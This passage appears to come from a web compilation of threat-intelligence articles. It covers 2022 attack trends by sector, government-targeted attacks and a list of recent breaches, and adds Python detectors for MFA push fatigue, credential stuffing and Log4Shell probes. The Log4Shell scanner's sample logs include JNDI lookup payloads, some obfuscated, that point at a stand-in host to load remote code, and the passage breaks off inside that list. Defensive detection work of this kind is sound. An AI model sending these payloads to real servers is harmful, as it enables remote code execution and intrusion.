  • Some threat actors developed better ways of obfuscating their espionage operations and intellectual property theft, making it increasingly difficult to identify who they were and what they were stealing. The use of obfuscation-as-a-service proxies became the method of choice for these threat actors to hide their tracks as they compromised victims and exfiltrated confidential and sensitive information.
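The Uber intrusion described earlier on this page (a fake two-factor notification pushed at an employee) and the bullet above on brute-force attempts to fatigue users through MFA come down to the same observable from the defender's side: a burst of push prompts that one user rejects or lets time out, sometimes followed by an approval. The following is an added example, not code from the IBM article, the PwC report or any MFA vendor; it assumes a constructed log format (timestamp, user, push result) and hypothetical thresholds (three rejected or timed-out pushes within ten minutes) and flags each such burst, noting whether an approval followed it.

```python
"""Flag MFA push-fatigue bursts in authentication logs.

Added example for this page; it is not code from the IBM article, the
PwC report or any MFA vendor. The log format, field names and thresholds
are assumptions chosen for the demonstration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from a real system). One push event per
# line: "<ISO-8601 timestamp> <user> <result>", where result is how the
# user answered the push: approved, denied or timeout (no answer).
SAMPLE_LOG = """\
2022-09-15T22:01:03Z alice denied
2022-09-15T22:01:41Z alice denied
2022-09-15T22:02:20Z alice timeout
2022-09-15T22:03:05Z alice denied
2022-09-15T22:03:50Z alice denied
2022-09-15T22:04:30Z alice approved
2022-09-15T09:12:00Z bob approved
2022-09-15T13:40:10Z bob denied
2022-09-15T13:55:00Z bob approved
"""

# Results that count as the user not accepting the push.
REJECTED = ("denied", "timeout")


def parse_log(text):
    """Parse the constructed format into (timestamp, user, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, result))
    return events


def find_push_fatigue(events, window=timedelta(minutes=10), threshold=3):
    """Return one alert per user for the first burst of rejected pushes.

    A burst is `threshold` or more denied/timed-out pushes for one user
    inside a forward-looking window of length `window`. An approval inside
    the same window is the high-severity case: the user may have given in.
    """
    by_user = defaultdict(list)
    for ts, user, result in events:
        by_user[user].append((ts, result))

    alerts = []
    for user, evs in by_user.items():
        evs.sort()  # log lines are not guaranteed to arrive in time order
        for i, (ts, result) in enumerate(evs):
            if result not in REJECTED:
                continue
            # Window starts at this rejected push and looks forward.
            burst = [e for e in evs[i:] if e[0] - ts < window]
            rejected = [e for e in burst if e[1] in REJECTED]
            if len(rejected) >= threshold:
                alerts.append({
                    "user": user,
                    "start": ts,
                    "rejected": len(rejected),
                    "approved_after_burst": any(e[1] == "approved" for e in burst),
                })
                break  # report the first burst per user, then move on
    return alerts


if __name__ == "__main__":
    for alert in find_push_fatigue(parse_log(SAMPLE_LOG)):
        sev = "HIGH" if alert["approved_after_burst"] else "MEDIUM"
        print(f"[{sev}] {alert['user']}: {alert['rejected']} rejected pushes "
              f"from {alert['start'].isoformat()}")
```

On the sample input only alice is flagged, as a high-severity case because an approval followed five rejected pushes. A burst with no approval still deserves a ticket: a push is normally only sent after a correct password, so a run of unexpected prompts is itself evidence that the password is in someone else's hands and should be rotated, whatever the user answered.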

Looking ahead:

Attackers will continue scouring unpatched systems for Log4Shell and other vulnerabilities and will exploit where they can. Software library vulnerabilities are also likely to be an exploitation focus for threat actors in the year ahead.

Poor or inconsistent patching regimes continue to be a key factor behind successful intrusions into networks. Most successful attacks exploit vulnerabilities for which the manufacturer or developer has already released a fix that customers can apply. Successful attacks that result from 0-day exploits are still comparatively rare. Attackers will do the minimum they need to gain access to a network and will not burn higher-end capabilities unnecessarily.

We therefore recommend that organisations prioritise defence in depth and rigorous patching in their security strategies to raise the barrier to entry for attackers.

Geopolitical issues and the threat landscape

  • Espionage and sabotage motivated threat actors used their offensive cyber capabilities to complement traditional warfare approaches. They used these against countries and private entities seen to be supporting their perceived enemies. They sought to gain strategic advantage by weakening digital and physical infrastructure.
  • Threat actors continued to engage in the contest for economic supremacy through intellectual property theft, with cyber attacks exacerbating ongoing supply chain issues and financial challenges. Threat actors used procured infrastructure, as well as compromised assets, to infiltrate and interdict supply chains, as well as to undermine secure communications around the world. Targets included high-end technology firms and telecommunications, manufacturing and logistics sectors.

Security and law enforcement agencies, along with the commercial security industry, will continue to use public disclosures to counter the activities of APTs and thwart their operations. Cloud service, managed service and identity and access management (IAM) providers with privileged access to client networks will increasingly become targets of choice for the most sophisticated actors – to achieve the scaled access they need to compromise the targets of their espionage and intellectual property theft operations.

In the full Cyber Threats 2022: A Year in Retrospect report, learn about these significant events and trends in more detail.

Evolving cyber crime

  • Ransomware continued to be a major threat to industries around the world, as threat actors were able to circumvent security measures and successfully infect networks, from manufacturing to retail and beyond, and extort high ransoms from their victims. Governments and private companies responded to cyber threats with sanctions and blacklisting, which shut down the operations of at least one major ransomware group. Due to the fractured and fluid nature of ransomware groups, many cyber criminals simply moved to deploy their skills and capabilities in other, lesser-known brands and operations.
  • Credential stealing malware proliferated within the cyber criminal ecosystem and bolstered the demand for Access-as-a-Service (AaaS) and other commoditised cyber criminal offerings, which powered cyber-enabled fraud and opportunistic attacks spanning multiple industries and countries.

Governments will also explore the continued use of sanctions as a way of hamstringing ransomware and other threat actors, as well as their access to and use of extorted and stolen funds. Organisations will increasingly be required to build their defence efforts and security strategies to account for more frequent attacks powered by an increasingly commoditised -as-a-Service cyber criminal ecosystem.


Sectors 

Threat actors vary in motivation and sophistication, tailoring operations and opportunistic attacks in different sectors. In 2022, attacks in one sector cascaded to other industries and inflicted greater damage. That’s due to increased interconnections among increasingly digitised supply chains and industries.

Sector-specific motivations, summarized by PwC Threat Intelligence from 2022 case studies and in-house analytics, follow for each sector.

Aerospace and Defence

Motivations: Espionage, cyber crime, sabotage, hacktivism

Military secrets and sophisticated technologies make this highly sensitive and important sector a prime target every year by cyber threats. But 2022 proved especially challenging as threat actors worked hard to penetrate A&D organizations and contractors, particularly in Europe. Their motives ran the gamut:

Espionage-motivated threat actors wanted research and development secrets as well as military plans and capabilities.

Saboteurs, hoping to weaken a rival’s defences, might try to inhibit research or halt production.

Ransomware attackers were willing to bet that high-value, defence contracting companies would pay to recover sensitive data. They often upped the ante by threatening to publish ransomed data on leak sites to collect from victims a second time.

Automotive

Motivations: Cyber crime, espionage

The auto industry is speeding along on the digital highway, transforming rapidly and perhaps more completely than many other sectors. 

Automakers must secure not only the software and hardware that make up their vehicles but also the factories that manufacture them. Their distributors and suppliers are targets, as well. 

Ransomware operators hit the automotive supply chain worldwide in 2022 and posted information on leak sites from 75 organisations. Many of these incidents brought operations to a standstill and left manufacturers without needed parts or equipment. 

We also saw evidence of espionage, including compromises resulting in threat actors stealing sensitive and proprietary information from victims.

Construction

Motivations: Cyber crime, espionage, sabotage, hacktivism

The many builders, engineers and suppliers who must work together on construction projects increasingly use digital technologies to operate and connect. Each is vulnerable to intruders who seek primarily, in this sector, money and information. 

Among ransomware leak site victims in 2022, 10% were in construction and engineering, making it number two among sectors. Only manufacturing suffered more ransomware-generated leaks.

Meanwhile, espionage agents sought to steal information or halt operations in the moment and to plant the seeds for doing so later. Their attacks stood to affect projects linked to government agencies, public infrastructure, and the public interest, including water and utilities, transportation, public buildings and even corporate facilities.

Education

Motivations: Espionage, cyber crime, sabotage

Knowledge is power. Espionage-motivated threat actors know this, and have targeted academia for sensitive data and research, as well as information on researchers.

Attackers have more ways to get in than ever before. Partly as a result of the COVID-19 pandemic, so much of learning itself now happens online, and school administrations have increasingly gone digital. Each new connection, device and platform expands the attack surface of educational systems and networks. 

Ransomware attacks had an immense impact on this sector in 2022, and cyber criminals dominated headlines, as victims in many cases were forced to shut down operations while systems were being restored. Education’s traditional role as an open space for the free exchange of ideas and information may make the sector an easier target. We saw hundreds of schools’ data and systems around the world held for ransom in 2022.

Energy

Among the most critical of infrastructure and most important of resources, energy has become a prime target for cyber criminals and other threats. But the stakes rose in 2022.

Last year we saw espionage-motivated threat actors and saboteurs targeting energy producers and distributors as a complement to conventional warfare. The intruders had often positioned themselves in advance, breaching systems to gain a foothold in victim networks, gather information and plant malware for future use. Hacktivists also re-emerged and targeted energy sector organisations in 2022, often through DDoS attacks.

Ransomware attacks, too, increased, with actors frequently using double extortion to coerce victims. In exchange for the first payment, they’d decrypt the victims’ data. The second would keep them from posting the stolen data on leak sites or selling it.

Financial services

Perhaps not surprisingly, money was the ultimate driver for threat actors targeting financial services (FS) in 2022. Ransomware hit FS hard in 2022: the sector accounted for 5% of all ransomware leak site victims. Cryptocurrency theft resulted in the loss of millions of US dollars, as well. And fraud was an ongoing concern as threat actors used cyber methods to buy items using others’ payment cards, hack into financial accounts, commit identity theft, and conduct other fraudulent acts.

But money wasn’t the only objective. Some used sabotage to slow and even halt financial transactions and stymie the flow of money, aiming to cripple economies. And threat actors continued to slip in to view sensitive financial data and systems.

Government

Adversaries, eyeing the sensitive information that governments collect and maintain, carried out sophisticated attacks in acts of cyber espionage in 2022.

Saboteurs, too, were active. They attempted to disable or disrupt government services and destroy or manipulate sensitive information and communications. They also released disinformation and leaked data regarding high-profile events and issues. 

Opportunistic cyber criminals, too, targeted the government. They followed headlines to launch ransomware attacks on public agencies and organisations. And as world events and tensions evolved, they injected themselves into geopolitical conflicts.

Healthcare

Motivations: Cyber crime, espionage, sabotage

Healthcare perhaps faced the most peril from cyber threats of any sector, with people’s very lives potentially at stake. And as providers’ and patients’ use of technology grew, so did opportunities for theft and worse.

Espionage by those seeking personal and proprietary information remained a concern, as did sabotage that might shut down systems and compromise patient care. But ransomware posed the greatest threat in 2022.

The damage that threat actors can do is vast in a cyber attack: they can bring down entire networks, affecting patients, providers, third parties, operators, facilities and more.

Manufacturing

Motivations: Cyber crime, espionage, sabotage, hacktivism

Operational technology (OT) took center stage among cyber concerns in 2022 as factories continued to digitise, moving toward increased automation. Each new connection poses a new cyber threat, number one of which is ransomware.

A ransomware attack that freezes or shuts down a factory’s OT costs revenue and time, and could endanger workers. Cyber criminals are making use of these concerns, first striking and then attempting to extort for profit. Manufacturing companies ranked number one (15%) among ransomware leak site victims in 2022.

A production halt can ripple up and down the supply chain and exacerbate other shortages, as happened last year. Critical infrastructure, government, business, suppliers and distributors could all suffer losses.

On our 2023 watchlist: semiconductor manufacturing, as the US and others continue to impose restrictions. Cyber criminals are savvy about world events, and are certainly watching.

Pharmaceuticals and life sciences

Research is the lifeblood of pharma, but it’s also a prime attractant for espionage.

As companies rely on technologies to advance their research and produce groundbreaking medicines ever more rapidly, they also create incentives for cyber criminals to break in and provide them with more avenues through which to do so.

Espionage-motivated threat actors abound, working to infiltrate laboratories via third parties, Internet of Things (IoT) technologies, cloud environments, software misconfigurations and more to view and steal sensitive and proprietary information and disrupt production.

The stakes go far beyond a product or pill, and even beyond such high profile projects as the development of new vaccines and other lifesaving treatments. Bad actors can also undercut companies’ profits and cause regulatory problems and reputational damage. In 2022, we saw them use ransomware to extort pharma and life sciences companies: Pay or suffer the consequences.

Professional services

Threat actors want badly what professional services (PS) companies have: namely, a wealth of project and operations information as well as sensitive proprietary, personal and financial data about clients in the private and public sectors.

Threat actors often target PS organisations with fraud in mind, using these companies’ compromised networks to access their clients’ data. Or they may use access to email accounts to conduct convincing spoofing, phishing and social engineering campaigns.

But money remains a significant motivator in PS breaches. Among victim data posted to ransomware leak sites in 2022, 9% came from professional services, making it the third highest sector last year among ransomware leak site victims.

As more PS organizations use the cloud and other technologies, we expect to see threat actors work more diligently to compromise these services as well as to circumvent identity and access management (IAM) controls.

Retail

The retail industry is a cash cow for cyber criminals and fraudsters. As the use of contactless payments grew in 2022, we saw more widespread use of phony processing applications to steal customer data, including payment card information.

Threat actors may use customers’ credentials to gain access to their retail accounts and make fraudulent purchases of items that they then return for a refund to their own accounts — a popular tactic in 2022.

Attackers also may disable retailers’ online marketplaces for ransom, effectively shutting down business. The retail sector was the fourth hardest hit among ransomware leak site victims last year and accounted for 8% of all organisations leaked by ransomware threat actors.

Such a competitive industry is bound to have its share of cyber espionage, as well. As retailers and developers create and patent their own software and technologies in heated competition, they face the enduring balancing act of security vs. speed. Threat actors can then slip in to view companies’ proprietary information and their customers’ personally identifiable information (PII), payment information, and online behaviours.

Sports and entertainment

Sports and entertainment has become a highly transactional, technology-driven, on-demand service — one that suffered an onslaught of cyber attacks in 2022.

Interrupting scheduled events can cost sports and entertainment organisations a lot of money. This includes content creators and owners, teams, venues and platforms. Criminals capitalized on this vulnerability, timing ransomware deployments to coincide with time-sensitive events. We anticipate more such attacks in 2023.

Threat actors pilfered from fans and subscribers, as well, intercepting their purchases to steal payment card information, for instance.

And they stole embargoed media, then leaked it for money or notoriety, as we saw in one widely publicised instance in 2022.

Technology

In the digital age, technology all but makes the world go around, making it a prime target for power-and-money-hungry cyber criminals and espionage-motivated threat actors.

Its omnipresent reach, extending into every sector, prompted threat actors to break into managed service providers, cloud service providers, and other widely-used services that provided access to users’ systems and networks.

Sophisticated cyber intrusions slipped into enterprise systems via software updates or systems maintenance tasks. Others used social engineering to exhaust security mechanisms and exploit users for granting access. 

Then, lurking inside their victims’ networks, a range of threat actors stole proprietary secrets and personal data, disrupted supply chains, launched attacks and damaged trust along the digital supply chain.

Telecommunications

This somewhat beleaguered sector suffered hits from a variety of threat actors, sometimes suffering punches from all sides in quick succession.

And because its data and telemetry contain much confidential intelligence, espionage-motivated actors focused keenly on telco, eager to scale their targeting and reconnaissance operations and enable future attacks.

Transportation and Logistics

The global supply chain links most critically in the transportation and distribution of raw materials and goods. The risks increased as companies connected more systems through operational technology (OT) and industrial control systems (ICS). We saw threats to transport and logistics not only grow, but also become more sophisticated.

The consequences could be dire. We saw an attack shut down one country’s entire railway system.

Supply chain and sector interdependencies in 2022 made it more and more likely that an incident might enormously affect not only the breached company but also its customers and third parties. Ransomware actors seized on this likelihood, often targeting transport and logistics firms in aggressive attacks.


Umang Handa

Partner, National Cybersecurity Managed Services Leader, PwC Canada

Tel: +1 416 815 5208

Cristina Onosé

Lead, Privacy Advocacy and Thought Leadership, PwC Canada

Tel: +1 416 687 8104

Kris McConkey

Global Threat Intelligence Lead Partner, PwC United Kingdom

Tel: +44 (0)7725 707360

Rachel Mullan

Global Threat Intelligence Lead, Director, PwC United Kingdom

Jason Smart

Global Threat Intelligence Lead, Director, PwC Australia

Tel: +44 (0)7718 979 308

Allison Wikoff

Global Threat Intelligence Lead, Director, PwC US

Matt Carey

Global Threat Intelligence Lead, Director, PwC Sweden

© 2017 - 2024 PwC. All rights reserved. PwC refers to the PwC network and/or one or more of its member firms, each of which is a separate legal entity. Please see www.pwc.com/structure for further details.

Apurva Venkat

Cyberattacks against governments jumped 95% in last half of 2022, CloudSek says

India, the US, Indonesia and China accounted for 40% of the total reported cyberattacks in the government sector.


The number of attacks targeting the government sector increased by 95% worldwide in the second half of 2022 compared to the same period in 2021, according to a new report by AI-based cybersecurity company CloudSek. 

The increase in attacks can be attributed to rapid digitization and the shift to remote work during the pandemic, which broadened the attack surface of government entities and paved the way for an increase in cyberwarfare waged by nation-state actors, according to the report.

Government agencies collect and store huge amounts of data, which include information about individual citizens that can be sold on the dark web . There is also a risk that national security and military data can be used by terrorist organizations. 

Increase in hacktivism and ransomware

In 2022 there was an increase in so-called hacktivist activity — hacking for political purposes — which accounted for about 9% of the recorded incidents reported in the government sector. Ransomware groups accounted for 6% of the total incidents reported. LockBit was the most prominent ransomware operator, the report noted. 

The number of government-sponsored attacks has also multiplied. This increase is due to the advent of offerings such as initial-access brokers and ransomware-as-a-service . 

“These statistics are suggestive of the fact that cyberattacks in this particular industry are no longer limited to financial gains; rather, they are now used as a means to express support or opposition for certain political, religious, or even economic events and policies,” the report said. 

“Threat actors have started developing and advertising services of dedicated criminal infrastructure which can be bought by governments or individuals and used for various nefarious purposes,” the report added.

Meanwhile, the average total cost of a breach in the public sector increased from $1.93 million to $2.07 million — a 7.25% increase between March 2021 and March 2022 — according to IBM.

KelvinSecurity, AgainstTheWest are most prominent threat actors

KelvinSecurity and AgainstTheWest were the two most prominent threat actors last year, according to CloudSek. The two groups were the most prominent in 2021 as well.

KelvinSecurity, operating under the handle Kristina, uses targeted fuzzing and exploits common vulnerabilities to target victims. The group shares their tools for free and targets victims with common underlying technologies or infrastructure. The group publicly shares information such as new exploits, targets, and databases on cybercrime forums and Telegram . They also have a data-leak website where other threat actors can share databases, the CloudSek report notes. 

AgainstTheWest started operations in October 2021 and identifies itself as APT49 or BlueHornet. It is focused on exfiltrating region-specific data and selling it on the dark web. The group has launched campaigns such as Operation Renminbi, Operation Ruble, and Operation EUSec, which targeted various countries. They also collaborate with different threat actors. 

“A confidential source in contact with the group ascertained that the group was exploiting SonarQube zero-day and Swagger UI vulnerabilities,” the CloudSek report noted. SonarQube is an open-source tool by SonarSource that automates code inspections; Swagger is a set of tools for API developers from SmartBear Software.

India, US, and China are most affected

India, the US, Indonesia, and China continued to be the most targeted countries in the past two years, accounting for 40% of the total reported incidents in the government sector. 

The attacks on the Chinese government were mainly attributed to APT groups. AgainstTheWest’s campaign Operation Renminbi was responsible for almost 96% of attacks against China, the report noted. The operation began as retaliation for China’s activities against Taiwan and the Uyghur community. Allegations that China was responsible for the outbreak of the pandemic also contributed to the increase in attacks. 

The Indian government was the most frequently targeted in 2022 due to the hacktivist group Dragon Force Malaysia’s #OpIndia and #OpsPatuk campaigns. Several hacktivist groups joined and supported these campaigns, which led to further attacks. Government agencies in India have become popular targets of extensive phishing campaigns, the report noted. 

After Russia attacked Ukraine, several state-sponsored actors and activists showed their support for Ukraine by attacking Russia. Attacks against Russia increased by over 600% during the year, making Russia's public sector the fifth most targeted in 2022.

To prevent future attacks, government agencies need to shift to a zero-trust model, in which user identities and the network itself are assumed to be potentially compromised and the authenticity of every user action is verified proactively, CloudSek noted.


Apurva Venkat

Apurva Venkat is principal correspondent for the India editions of CIO, CSO, and Computerworld. She has previously worked at ISMG, IDG India, Bangalore Mirror, and Business Standard, where she reported on developments in technology, businesses, startups, fintech, e-commerce, cybersecurity, civic news, and education.


Recent Cyber Attacks

Read about the latest cyber attacks and discover trends organizations should be aware of.

Recent Cyber Attacks from 2023

Even in ordinary times, cyber attacks are an ever-increasing problem causing trillions of dollars in losses. The war between Russia and Ukraine made matters worse, bringing a flurry of major politically motivated cyber attacks in 2022. Here are some of the recent cyber attacks.

Hot Topic attacks

In August 2023, American retailer Hot Topic notified its customers they had detected automated attempts by unauthorized third parties to log into customer accounts on both their website and their mobile app. The attack involved "valid account credentials (e.g., email addresses and passwords) obtained from an unknown third-party source."
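Credential stuffing of this kind leaves a distinctive trace in authentication logs: one source tries many different accounts in a short window, with a low but non-zero success rate, because the credentials were valid somewhere else. The following detector is an added example written for this page, not Hot Topic's tooling or code from the page; the log events, IP addresses, account names, window length and threshold are all constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # look-back per source IP (tuning assumption)
MIN_DISTINCT_ACCOUNTS = 5        # distinct accounts per source in WINDOW before alerting

# Constructed sample authentication events for this example (not real data):
# (timestamp, source IP, account, outcome). 192.0.2.5 is an ordinary user who
# mistypes a password once; 203.0.113.10 cycles through leaked credentials and
# occasionally gets in; 198.51.100.77 is a single normal login.
SAMPLE_EVENTS = [
    ("2023-08-01T10:00:00", "192.0.2.5", "alice@example.com", "fail"),
    ("2023-08-01T10:00:07", "192.0.2.5", "alice@example.com", "success"),
    ("2023-08-01T10:00:01", "203.0.113.10", "bob@example.com", "fail"),
    ("2023-08-01T10:00:02", "203.0.113.10", "carol@example.com", "fail"),
    ("2023-08-01T10:00:03", "203.0.113.10", "dave@example.com", "success"),
    ("2023-08-01T10:00:04", "203.0.113.10", "erin@example.com", "fail"),
    ("2023-08-01T10:00:05", "203.0.113.10", "frank@example.com", "fail"),
    ("2023-08-01T10:00:06", "203.0.113.10", "grace@example.com", "success"),
    ("2023-08-01T10:03:00", "198.51.100.77", "heidi@example.com", "success"),
]


def detect_credential_stuffing(events, window=WINDOW, min_accounts=MIN_DISTINCT_ACCOUNTS):
    """Return one alert per source IP that tries >= min_accounts distinct
    accounts within `window`. Each alert lists every account the source
    touched and the accounts it actually logged into, which are the ones
    that need a forced password reset and session revocation."""
    recent = defaultdict(deque)   # ip -> events still inside the window
    alerts = {}                   # ip -> alert, created when the threshold is crossed
    for ts_str, ip, account, outcome in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        q = recent[ip]
        q.append((ts, account, outcome))
        while ts - q[0][0] > window:   # drop events older than the window
            q.popleft()
        distinct = {acct for _, acct, _ in q}
        if len(distinct) < min_accounts:
            continue
        alert = alerts.setdefault(ip, {
            "source": ip,
            "first_seen": q[0][0].isoformat(),
            "accounts_tried": set(),
            "compromised": set(),
        })
        alert["accounts_tried"].update(distinct)
        alert["compromised"].update(acct for _, acct, out in q if out == "success")
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_credential_stuffing(SAMPLE_EVENTS):
        print(f"{alert['source']}: tried {len(alert['accounts_tried'])} accounts, "
              f"logged into {sorted(alert['compromised'])}")
```

The per-account view matters as much as the per-source view: a single failed login from a retrying user never crosses the threshold, while the stuffing source is flagged on its fifth distinct account and every subsequent success from it is recorded as a compromised account. In practice the same logic is run per ASN or per user agent as well, because attackers spread attempts across many addresses to stay under a per-IP threshold.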

Prospect Medical Holdings ransomware attack

In August 2023, several of Prospect Medical's offices, facilities, and hospitals were forced offline by a ransomware attack. The company closed some of its outpatient facilities and informed patients and families of the attack via its Facebook pages and websites. News organizations following the story reported that medical staff switched to manual procedures while the network was offline.

Global Threat Landscape Report 2H 2023

FortiGuard Labs Global Threat Landscape Report 2H 2023 shows Cybercriminals Exploiting New Industry Vulnerabilities 43% Faster than 1H 2023.

Cyber Attacks in 2022

Finnish parliament attack

In August 2022, the Finnish parliament's website experienced a DDoS attack while the parliament was in session. This denial-of-service attack may have been part of a coordinated campaign by Russian state-sponsored hackers to disrupt the Finnish government's websites in retaliation for Finland's application to join NATO. A DDoS attack temporarily blocks access to a website but does not cause permanent damage.

Ukrainian state nuclear power company attack

In August 2022, the Russian "hacktivist" group called the People's Cyber Army used a botnet reported at 7.25 million devices to flood the Energoatom website with junk web traffic and page requests in an attempt to take it down. Online services were disrupted for a few hours, with no lasting impact. The attack was part of a Russian psyops campaign to create fear of a nuclear disaster and intimidate Europeans.

Greek natural gas distributor attack

Greek national gas distributor DESFA reported a cyber attack in August 2022. The attack affected part of the company's IT infrastructure and caused a data leak. The Ragnar Locker ransomware operation is holding the stolen data hostage, demanding a ransom in exchange for not publishing sensitive data. The company refused to pay.

South Staffordshire Water Company attack

In August 2022, the South Staffordshire Water Company reported an attack that disrupted its internal corporate network and led to data loss. A ransomware group threatened to tamper with the water supplied by the company, a claim the company disputed. The criminals demanded payment in exchange for not releasing sensitive files and for explaining how the network breach happened.

Montenegro government attack

The government of Montenegro reported an unprecedented cyberattack on its digital infrastructure in August 2022. No data breach occurred, but certain government services and telecommunications were disrupted, including border crossings and airport operations. The state-owned utility company, EPCG, switched to manual operations as a precautionary measure.

Estonian government attack

A DDoS attack disrupted many Estonian government websites for several hours in April 2022. The attack targeted websites for the president, the Ministry of Foreign Affairs, the Police and Border Guard, the identification card webpage, and the state services digital portal. Estonia's condemnation of the Russian war on Ukraine makes the country a target for Russian hackers.

Islamic Culture and Communication Organization attack

The Iranian Islamic Culture and Communication Organization (ICCO) experienced a severe attack in July 2022. Six ICCO websites went down, and 15 others were defaced with photos of Massoud Rajavi, the Iranian Resistance leader. Data was also destroyed on 44 servers and hundreds of computers. The ICCO additionally lost 35 databases containing highly confidential information about money laundering, spies, and terrorists living abroad.

Belgian government and military attack

In July 2022, the Belgian government announced that three Chinese hacker groups, known Chinese Advanced Persistent Threat actors, had attacked Belgian public services and military defense forces. These Chinese government-sponsored attackers steal trade secrets and intelligence. One of them, the Soft Cell group, had launched a new remote access trojan (RAT) in June 2022.

UK military social media breach

Hackers took over the Twitter account of the  British Army  in July 2022. The social media account underwent multiple name and photo changes. The content started promoting contests to win Angry Apes non-fungible tokens (NFTs), digital art stored on a blockchain. The army’s YouTube page experienced an attack as well. Its name changed to Ark Invest, and the account promoted interviews of Elon Musk talking about cryptocurrency.

Lithuanian energy company attack

A DDoS attack in July 2022 blocked access to the website of the Lithuanian energy company Ignitis Group. The company managed the attack and limited the damage using DDoS protection. No data breach occurred, but the attacks were persistent and ongoing. The pro-Russia group Killnet claimed responsibility, describing the attack as retaliation for Lithuanian support of Ukraine in the war with Russia.

Additional Global Cyber Attacks

ProxyLogon cyberattack

One of the most damaging recent cyberattacks exploited a set of zero-day vulnerabilities in Microsoft Exchange Server, collectively known as ProxyLogon. Exploitation was initially attributed to the Hafnium group; Microsoft became aware of the vulnerabilities in January 2021 and patched them in March 2021. Other groups then joined Hafnium in attacking unpatched servers, and thousands of organizations were compromised.

MeetMindful cybersecurity breach

Dating app MeetMindful suffered a cybersecurity attack in January 2021, resulting in data of more than 2 million users being stolen and leaked. The hacking group behind the event managed to steal information like users’ full names and Facebook account tokens.

Tether attack

In March 2021, cyber criminals threatened to leak documents from Tether, the issuer of the USDT stablecoin. The attackers claimed the data would "harm the Bitcoin ecosystem" and demanded around 500 Bitcoin (about $24 million at the time), but Tether refused to pay.

CNA financial breach

A ransomware attack on insurance firm CNA Financial in March 2021 locked employees out of their systems and blocked access to corporate resources. Company data was also stolen, and CNA Financial reportedly paid a $40 million ransom.

Facebook cyberattack

Data of more than 530 million Facebook users, including their names, Facebook IDs, dates of birth, and relationship status, was published online in April 2021. Facebook, now Meta, said the information was obtained through scraping in 2019.

Colonial Pipeline attack

The growing threat that advanced cybersecurity attacks pose to the world was highlighted by the Colonial Pipeline attack in May 2021. The fuel pipeline operator suffered a ransomware attack launched by the DarkSide hacking group, which led to fuel disruption and mass panic buying across the U.S.

Omiai cyberattack

In May 2021, an intrusion into the systems of the Japanese dating app Omiai exposed data belonging to 1.7 million users.

Audi and Volkswagen cybersecurity breach

In June 2021, Audi and Volkswagen revealed a data breach had affected more than 3.3 million customers and prospective buyers, who were primarily U.S.-based. The breach was blamed on an associated vendor, which was purportedly responsible for exposing the data between August 2019 and May 2021.

Guntrader.uk cyberattack

The United Kingdom’s trading website for guns and shooting equipment revealed that records of 100,000 gun owners had been stolen and published online in July 2021. Gun ownership is strictly controlled in the U.K., so the data breach of customers’ names and addresses caused significant privacy and safety concerns. 

T-Mobile attack

In August 2021, telecoms firm T-Mobile suffered a cybersecurity breach that led to the data of around 50 million existing customers and prospects being stolen. The data, which included customer addresses, drivers' licenses, and social security numbers, was stolen by a 21-year-old, who claimed to have obtained around 106GB of information.

Poly Network breach

An attack on Poly Network in August 2021 showed that cryptocurrency platforms are an increasingly popular target. The cross-chain bridge operator revealed that an exploit of its smart contracts let the attacker drain cryptocurrency worth more than $600 million.

AP-HP attack

Cybersecurity attacks on medical organizations and healthcare firms are also increasing. As a result of the hack on AP-HP, a Paris public hospital system, in September 2021, cyber criminals stole personal data belonging to around 1.4 million people who were tested for COVID-19 in 2020. 

Cream Finance breach

Cream Finance, a decentralized finance lending platform, was exploited through a flaw in one of its lending markets. The hack, revealed in September 2021, caused losses worth about $34 million.

Debt-IN Consultants cyberattack

A South African debt recovery company suffered a significant attack in September 2021 that led to client and employee data being illegally accessed from its servers. The incident is suspected to have affected the personally identifiable information (PII), including owed debts, of over 1.4 million people.

Neiman Marcus data breach

Department store Neiman Marcus suffered a data breach that resulted in the exposure and theft of up to 3.1 million customers’ payment card details. The attack was detected in September 2021 but began in May 2020, and most of the data stolen was believed to have been from expired or invalid cards.

Argentinian government attack

A hacker, who claimed to have leaked the entire database of Argentina’s National Registry of Persons, has allegedly stolen the data of more than 45 million Argentinian residents. However, the government denied the hack.

Squid Game cyberattack

The value of a cryptocurrency linked to but not officially associated with the Netflix program Squid Game plummeted after a suspected exit scam in November 2021. The cryptocurrency’s value dropped from $2,850 to $0.003028 overnight, which resulted in investors losing millions of dollars.

Robinhood trading app breach

Also in November 2021, a data breach of the trading app Robinhood affected the data of around 5 million users. Data like usernames, email addresses, and phone numbers were compromised through a customer support system.

BitMart cyberattack

Yet another cybersecurity attack against digital currencies, BitMart suffered a breach that enabled cyber criminals to steal approximately $150 million worth of cryptocurrency in December 2021. The attack resulted in total losses of around $200 million, including damages. 

Log4j breach

In December 2021, a zero-day vulnerability was disclosed in the widely used Log4j Java logging library. The flaw, known as Log4Shell (CVE-2021-44228), allows remote code execution when the library processes a log message containing a crafted JNDI lookup such as ${jndi:ldap://attacker/x}, because Log4j resolves the lookup and loads the attacker's object. Exploitation began within hours of disclosure and was quickly picked up by botnets, including Mirai variants.
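Scanning for Log4Shell probes in web server logs is harder than grepping for "jndi": attackers URL-encode the payload and use Log4j's own lookup syntax (${lower:j}, ${::-j}) to hide the keyword. The scanner below is an added example written for this page, not Fortinet's code or tooling; the access-log lines, IP addresses and hostnames are constructed, and it goes slightly beyond the paragraph by normalising the common obfuscations before matching.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not real traffic).
# Lines 1-4 carry Log4Shell-style JNDI lookups in plain, case-obfuscated,
# URL-encoded and default-value-obfuscated forms; lines 0 and 5 are benign
# (line 5 contains a lookup, but not a JNDI one).
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://198.51.100.23/x}"',
    '10.0.0.9 - - "GET /?x=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.23%2Fy%7D HTTP/1.1" 404 "curl"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.23/z}"',
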